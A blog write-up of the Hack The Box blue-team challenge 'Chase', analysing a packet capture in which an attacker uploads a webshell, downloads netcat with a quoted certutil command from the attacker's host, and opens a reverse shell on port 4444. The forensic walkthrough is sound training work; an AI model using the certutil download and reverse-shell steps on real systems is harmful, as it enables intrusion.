HTB: Intro to Blue Team: Chase

Michael Koczwara
3 min readSep 27, 2021

Hack The Box

Edit description

Description

One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We’ve taken a network capture before shutting the server down to make a clone of the disk. Can you take a look at the PCAP and see if anything is up?

Attack Analysis

22.22.22.7 is an attacker and 22.22.22.5 is the webserver

Filtering for HTTP traffic to make it clear.

HTTP Traffic

First GET HTTP Requests and Responses from webserver 22.22.22.5

An attacker uploaded a webshell first (authKey=admin).

An attacker executed a command line and downloaded netcat via certutil.

certutil -urlcache -split -f http://22.22.22.7/nc64.exe

Now we can see netcat running on the webserver connecting back to an attacker machine over port 4444

An attacker executed whoami, ipconfig commands on the webserver.

Michael Koczwara

Written by Michael Koczwara

1.2K Followers

Security Researcher

More from Michael Koczwara

Recommended from Medium

Lists

Staff Picks

Stories to Help You Level-Up at Work

Self-Improvement 101

Productivity 101